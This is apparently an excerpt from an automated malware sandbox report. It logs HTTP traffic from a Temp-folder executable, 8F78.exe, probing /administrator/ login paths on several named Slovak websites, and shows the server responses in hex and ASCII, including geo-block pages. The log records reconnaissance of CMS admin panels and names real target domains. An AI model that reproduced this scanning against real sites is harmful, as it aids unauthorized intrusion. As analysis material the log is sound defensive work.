                                                                                                                                                                                                                                                                                                                                Data Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 eb 6f db 36 10 ff 9e bf e2 ea c0 70 82 49 b6 9e 8e ed ca c6 ba b6 c3 f2 61 d8 d0 a4 1f b6 61 1f 68 e9 64 73 a1 44 8d a2 e3 b8 43 ff f7 1d 25 f9 a5 3a 29 6a 0c a3 ad 07 79 c7 1f 8f f7 e2 29 7a 95 c8 58 6f 0a 84 a5 ce c4 ec 22 32 0f 10 2c 5f 4c 3b 98 77 66 17 34 82 2c 99 5d 00 b5 28 43 cd 20 5e 32 55 a2 9e 76 56 3a b5 47 9d 43 52 ce 32 9c 76 1e 39 ae 0b a9 74 07 62 99 6b cc 89 75 cd 13 bd 9c 26 f8 c8 63 b4 ab 8e 05 3c e7 9a 33 61 97 31 13 38 75 2d 28 97 8a e7 0f b6 96 76 ca f5 34 97 27 a0 95 9c 4b 5d 1e 00 e7 92 e7 09 3e 59 90 cb 54 0a 21 d7 e6 8d a9 78 c9 1f 71 3b 5f 73 2d 70 f6 5e 29 a9 20 70 fc 68 50 0f d4 c4 52 6f b6 ef a6 99 ed 5b bb de 5c 26 1b f8 67 d7 ad 18 90 2f 96 7a 02 ae e3 74 5f 1f 51 aa 6d 9d 22 64 4c 2d 78 3e 01 e7 78 b8 60 49 c2 f3 c5 d1 f8 e7 dd db 4b 32 a4 b4 7b 3b 65 19 17 9b 09 d8 ac 28 04 da e5 a6 d4 98 59 f0 83 20 1d fe cc e2 bb aa ff 23 71 5a d0 b9 c3 85 44 f8 78 db b1 e0 83 d1 a0 b4 e0 27 14 8f a8 79 cc 2c 78 a3 c8 0c a4 7e 96 97 76 89 8a a7 34 e3 8d 01 85 b7 52 90 ce de 67 f2 2f de 39 80 39 31 72 b7 c9 e6 52 74 8e 77 38 67 f1 c3 42 c9 55 9e d8 b1 41 9a c0 b2 14 ec ca b1 c0 e9 5a 95 a2 e8 7e fd ec 1c 9e b1 05 4e 40 b1 c4 b8 c9 c2 3c c9 e6 57 4c 83 eb 77 61 3c a6 d9 15 9e 17 8e 8e 11 c1 29 c8 23 b4 a2 0d 15 4c d1 1c 08 9d ee b5 75 0a e9 c6 23 a4 e1 16 c9 f7 ce 06 1a dd 74 61 e8 6f 81 5c ef 7c a4 60 dc 85 30 dc 23 0d cf 46 0a dd 2e b8 c1 4e 4d ce f9 32 19 85 ef 44 f2 82 f3 81 7c 52 93 77 b3 d7 b7 bf 45 09 dc 6f 85 72 69 77 fe ce 74 9e 17 5a 70 63 0c e0 79 df 8a 34 0a bb 10 8c fe 13 a1 46 41 d7 ec f1 db 84 6a e5 05 59 52 62 94 94 30 14 0a a6 29 91 bd 98 1f 96 6e 2b 3b d8 6b 9c 3f 70 6d 1f 46 9f e0 c5 04 34 3e e9 d7 27 59 0d 85 92 ae 10 db 38 3d 90 f0 f9 90 7e 06 f4 2c b0 26 d6 29 79 21 53 7b 8d 92 e3 85 09 2e 2c b8 4c 7c c7 19 91 df 5d 3a a9 17 0c fd b6 ce ea 5c 4a 67 07 89 e4 f4 43 cc 5e d4 d9 a5 39 3f 18 ad a5 5a ba 6b 72 b8 ef 1c 02 98 b6 cb e1 c0 56 5a b6 b6 21 9f ec 72 c9 12 b9 26 93 2d e6 26 21 91 d9 f7 37 a7 5f 1b 1e dc e6 32 ef 3c a7 33 d4 aa f9 43 ca 88 e6 1a fb 86 d9 0b 6b ee b0 9a e2 98 bb ed 55 7e 53 31 9b ec 59 ff fb 7e cd e8 9b db b0 e2 33 af cf e9 78 02 97 69 9a 9e 76 80 b9 54 09 2a db a8 7d 55 4e 20 6c a3 d8 99 fc f4 55 a6 af d1 f7 8e cd e6 a5 14 2b 8d c7 f4 ca 78 61 fb f4 14 98 ea 13 c3 95 53 a5 52 65 8d 7f 51 a4 e0 95 1d 9a a8 b5 bf 8c a9 ca 27 99 e0 0b 5a 3c 26 c7 42 f5 a2 7f 7c 9f 21 45 36 c8 5c 6c a0 8c 15 62 0e 2c 4f e0 2a 63 4f 76 e3 22 81 31 cc 75 cb 7d 9e f5 2b d3 9a 89 23 a7 7b 44 fa 7c 96 20 3c df 0b e2 1a 41 da f2 8d 87 ff 87 7c 97 09 d5 66 5c 94 2d b8 26 f0 2f c7 a9 f9 1d 9b a2 2a 5e 4a fe 09 4d a0 8e da 71 b6 2b 8a 5c cc aa cb ab 9f 2f 9a 2b 96 09 9e 2a 91 ea 55 dc be ff b5 7c b0 6c eb a3 71 e5 26 9d 18 39 c8 61 79 42 11 e4 98 df 49 bf a7 ba 4a cb ec 8b 32 af a1 d6 6e 7c 9a a6 ea 92 b2 45 ac 53 4e 2d 83 f7 e5 06 a2 41 53 ba 46 83 ba 42 bf 88 4c a9 d8 94 b5 09 7f 04 9e 4c 3b 3b 83 77 f6 35 6e b4 74 0f ab 61 ea ed 49 c5 ec 37 b9 52 74 f2 fc bd c2 52 c3
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4C0Wo6pIaahdsDC%:)jy)zXo"2,_L;wf4,](C ^2UvV:GCR2v9tbku&c<3a18u-(v4'K]>YT!xq;_s-p^) phPRo[\&g/zt_Qm"dL-x>x`IK2{;e(Y #qZDx'y,x~v4Rg/991rRtw8gBUAZ~N@<WLwa<)#Lu#tao\|`0#F.NM2D|RwEoriwtZpcy4FAjYRb0)n+;k?pmF4>'Y8=~,&)y!S{.,L|]:\JgC^9?ZkrVZ!r&-&!7_2<3CkU~S1Y~3xivT*}UN lU+xaSReQ'Z<&B|!E6\lb,O*cOv"1u}+#{D| <A|f\-&/*^JMq+\/+*U|lq&9ayBIJ2n|ESN-ASFBLL;;w5ntaI7RtR
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.055448055 CET227INData Raw: 92 95 30 37 5e 37 17 32 7e c0 e4 55 34 28 0e 81 14 0c 0e ba db 45 1b a7 38 58 b2 22 97 19 13 e2 78 cc b4 0f cd 5a b7 ef 26 10 19 53 ce 5c 3f 1d 25 18 a7 8e 37 76 1d 1c 8f c3 71 30 64 7e 10 78 e8 a5 a3 9b e0 26 1a 54 6c d1 fc 68 f9 6d bb e7 19 c1
                                                                                                                                                                                                                                                                                                                                Data Ascii: 07^72~U4(E8X"xZ&S\?%7vq0d~x&TlhmE93Ye,r\;5ZrcA=`1^{w0\_??;xwRorve]owC^qAKn?o|KG0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                41192.168.2.45277992.240.253.3805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.531877995 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.786971092 CET439INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                location: https://eurokamen.sk/administrator/
                                                                                                                                                                                                                                                                                                                                content-length: 243
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eurokamen.sk/administrator/">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.089047909 CET185OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: eurokamen.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.343763113 CET457INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                location: https://eurokamen.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                content-length: 252
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 6b 61 6d 65 6e 2e 73 6b 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eurokamen.sk/administrator/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                42192.168.2.45277537.9.175.188805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.532799959 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.790440083 CET1286INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Data Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 2e 77 65 62 73 75 70 70 6f 72 74 2e 73 6b 2f 73 74 61 74 69 63 2f 77 65 62 73 75 70 70 6f 72 74 2d 6c 6f 67 6f 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 70 6e 67 3e 0a 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 0a 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e 0a 3c 70 3e 3c 62 72 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 20 20 76 61 72 20 5f 67 61 71 20 3d 20 5f 67 61 71 20 7c 7c 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 37 32 38 33 34 38 36 2d 33 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 74 72 61 63 6b 50 61 67 65 76 69 65 77 27 5d 29 3b 0a 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 67 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 67 61 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20 67 61 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 67 61 2e 73 72 63 20 3d 20 28 27 68 74 74 70 73 3a 27 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3f 20 27 68 74 74 70 73 3a 2f 2f 73 73 6c 27 20 3a 20 27 68 74 74 70 3a 2f 2f 77 77 77 27 29 20 2b 20 27 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3b 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 61 2c 20 73 29 3b 0a 20 20 7d 29 28 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 66 6f 6e 74 20 73 69 7a 65 3d 2b 32 3e 3c 62 3e 53 4b 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 62 72 3e 0a 5a 20 64 c3 b4 76 6f 64 75 20 6f 63 68 72 61 6e 79 20 68 6f 73 74 69 6e 67 6f 76 20 70 72 65 64 20 6f 70 61 6b 75 6a c3 ba 63 69 6d 69 20 c3 ba 74 6f 6b 6d 69 20 73 6d 65 20 62 6f 6c 69 20 6e c3 ba 74 65 6e c3 ad 20 70 72 65 20 76 79 62 72 61 6e c3 a9 20 6b 72 61 6a 69 6e 79 20 6f 62 6d 65 64 7a 69 c5 a5 20 70 72 c3 ad 73 74 75 70 20 64 6f 20 61 64 6d 69 6e 69 73 74 72 61 74 c3 ad 76 6e 65 68 6f 20 72 6f 7a 68 72 61 6e 69 61 20 77 65 62 6f 76 c3 bd 63 68 20 73 74 72 c3 a1 6e 6f 6b 2e 20 50 6f 6b 69 61 c4 be 20 70 6f 74 72 65 62 75 6a 65 74 65 20 73 20 61 64 6d 69 6e 69 73 74 72 c3 a1 63 69 6f 75 20 70 72 61 63 6f 76 61 c5 a5 20 7a 6f 20 7a 61 68 72 61 6e 69 c4 8d 69 61 2c 20 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https://m.websupport.sk/static/websupport-logo-transparent.png></td></tr><tr><td align="left"><p><br><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-7283486-31']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script><font size=+2><b>SK</b></font><br>Z dvodu ochrany hostingov pred opakujcimi tokmi sme boli nten pre vybran krajiny obmedzi prstup do administratvneho rozhrania webovch strnok. Pokia potrebujete s administrciou pracova zo zahraniia, p
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.790460110 CET1286INData Raw: 72 6f 73 c3 ad 6d 20 70 72 69 68 6c c3 a1 73 74 65 20 73 61 20 64 6f 20 57 65 62 61 64 6d 69 6e 75 2c 20 70 72 65 6a 64 69 74 65 20 64 6f 20 73 70 72 c3 a1 76 79 20 64 6f 6d c3 a9 6e 79 20 61 20 76 20 73 65 6b 63 69 69 20 22 43 4d 53 20 2d 20 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: rosm prihlste sa do Webadminu, prejdite do sprvy domny a v sekcii "CMS - redakn systmy" kliknite na Vypn geoip filter.</p><p><font size=+2><b>EN</b></font><br>Due to protection of web servers from repeated attacks,
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.790498972 CET78INData Raw: 6f 6e 2e 20 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 61 20 6d 65 67 c3 a9 72 74 c3 a9 73 74 21 0a 3c 2f 70 3e 0a 0a 0a 3c 2f 74 64 3e 0a 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: on. Ksznjk a megrtst!</p></td></tr></table></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.790514946 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.795329094 CET242OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aloeveraforever.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://aloeveraforever.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052246094 CET1286INHTTP/1.1 509
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:23 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Data Raw: 39 39 36 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 20 74 65 78 74 3d 22 62 6c 61 63 6b 22 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 2e 77 65 62 73 75 70 70 6f 72 74 2e 73 6b 2f 73 74 61 74 69 63 2f 77 65 62 73 75 70 70 6f 72 74 2d 6c 6f 67 6f 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 70 6e 67 3e 0a 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 0a 3c 74 64 20 61 6c 69 67 6e 3d 22 6c 65 66 74 22 3e 0a 3c 70 3e 3c 62 72 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 20 20 76 61 72 20 5f 67 61 71 20 3d 20 5f 67 61 71 20 7c 7c 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 37 32 38 33 34 38 36 2d 33 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 74 72 61 63 6b 50 61 67 65 76 69 65 77 27 5d 29 3b 0a 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 76 61 72 20 67 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 20 67 61 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 20 67 61 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 67 61 2e 73 72 63 20 3d 20 28 27 68 74 74 70 73 3a 27 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3f 20 27 68 74 74 70 73 3a 2f 2f 73 73 6c 27 20 3a 20 27 68 74 74 70 3a 2f 2f 77 77 77 27 29 20 2b 20 27 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3b 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 67 61 2c 20 73 29 3b 0a 20 20 7d 29 28 29 3b 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 66 6f 6e 74 20 73 69 7a 65 3d 2b 32 3e 3c 62 3e 53 4b 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 62 72 3e 0a 5a 20 64 c3 b4 76 6f 64 75 20 6f 63 68 72 61 6e 79 20 68 6f 73 74 69 6e 67 6f 76 20 70 72 65 64 20 6f 70 61 6b 75 6a c3 ba 63 69 6d 69 20 c3 ba 74 6f 6b 6d 69 20 73 6d 65 20 62 6f 6c 69 20 6e c3 ba 74 65 6e c3 ad 20 70 72 65 20 76 79 62 72 61 6e c3 a9 20 6b 72 61 6a 69 6e 79 20 6f 62 6d 65 64 7a 69 c5 a5 20 70 72 c3 ad 73 74 75 70 20 64 6f 20 61 64 6d 69 6e 69 73 74 72 61 74 c3 ad 76 6e 65 68 6f 20 72 6f 7a 68 72 61 6e 69 61 20 77 65 62 6f 76 c3 bd 63 68 20 73 74 72 c3 a1 6e 6f 6b 2e 20 50 6f 6b 69 61 c4 be 20 70 6f 74 72 65 62 75 6a 65 74 65 20 73 20 61 64 6d 69 6e 69 73 74 72 c3 a1 63 69 6f 75 20 70 72 61 63 6f 76 61 c5 a5 20 7a 6f 20 7a 61 68 72 61 6e 69 c4 8d 69 61 2c 20 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: 996<html><head><meta charset="UTF-8"><title>The page is temporarily unavailable</title><style>body { font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body bgcolor="white" text="black"><table width="100%"><tr><td><img src=https://m.websupport.sk/static/websupport-logo-transparent.png></td></tr><tr><td align="left"><p><br><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-7283486-31']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script><font size=+2><b>SK</b></font><br>Z dvodu ochrany hostingov pred opakujcimi tokmi sme boli nten pre vybran krajiny obmedzi prstup do administratvneho rozhrania webovch strnok. Pokia potrebujete s administrciou pracova zo zahraniia, p
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052337885 CET1286INData Raw: 72 6f 73 c3 ad 6d 20 70 72 69 68 6c c3 a1 73 74 65 20 73 61 20 64 6f 20 57 65 62 61 64 6d 69 6e 75 2c 20 70 72 65 6a 64 69 74 65 20 64 6f 20 73 70 72 c3 a1 76 79 20 64 6f 6d c3 a9 6e 79 20 61 20 76 20 73 65 6b 63 69 69 20 22 43 4d 53 20 2d 20 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: rosm prihlste sa do Webadminu, prejdite do sprvy domny a v sekcii "CMS - redakn systmy" kliknite na Vypn geoip filter.</p><p><font size=+2><b>EN</b></font><br>Due to protection of web servers from repeated attacks,
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052381039 CET78INData Raw: 6f 6e 2e 20 4b c3 b6 73 7a c3 b6 6e 6a c3 bc 6b 20 61 20 6d 65 67 c3 a9 72 74 c3 a9 73 74 21 0a 3c 2f 70 3e 0a 0a 0a 3c 2f 74 64 3e 0a 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: on. Ksznjk a megrtst!</p></td></tr></table></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.052418947 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                43192.168.2.45277883.167.249.7805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.533457994 CET184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kompresory-servis.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
